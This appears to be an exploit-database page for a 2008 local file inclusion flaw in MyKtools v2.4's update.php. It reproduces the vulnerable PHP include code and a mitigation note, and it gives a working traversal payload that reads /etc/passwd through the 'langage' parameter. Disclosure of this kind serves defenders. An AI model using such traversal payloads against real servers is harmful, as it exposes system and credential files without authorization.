header-logo
Suggest Exploit
vendor:
by:
x0r
7.5
CVSS
HIGH
LFI
22
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

LFI (Local File Inclusion)

The exploit allows an attacker to include local files on the server by manipulating the 'langage' parameter in the 'update.php' script. By using directory traversal techniques, the attacker can access sensitive files such as the '/etc/passwd' file. This vulnerability can be exploited to gain unauthorized access and retrieve sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before using it in file inclusion operations. Additionally, access controls should be implemented to restrict the files that can be included.
Source

Exploit-DB raw data:

##############
# Autor: x0r
#
# Email: evolutionteam.x0[at]gmail[dot]com
#
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
#
# Bug: LFI
##############

Bug:

In \update.php

// Include du fichier langue
if ($_GET['langage'])
{
$langue = $_GET['langage'];
include ("lang/".$langue.".php");
}

Exploit: \update.php?langage=../../../../../../etc/passwd%00

p0wn3d Beby.

-=EOF=-

# milw0rm.com [2008-10-27]

Navigation

Suggest Exploit

Services By CQR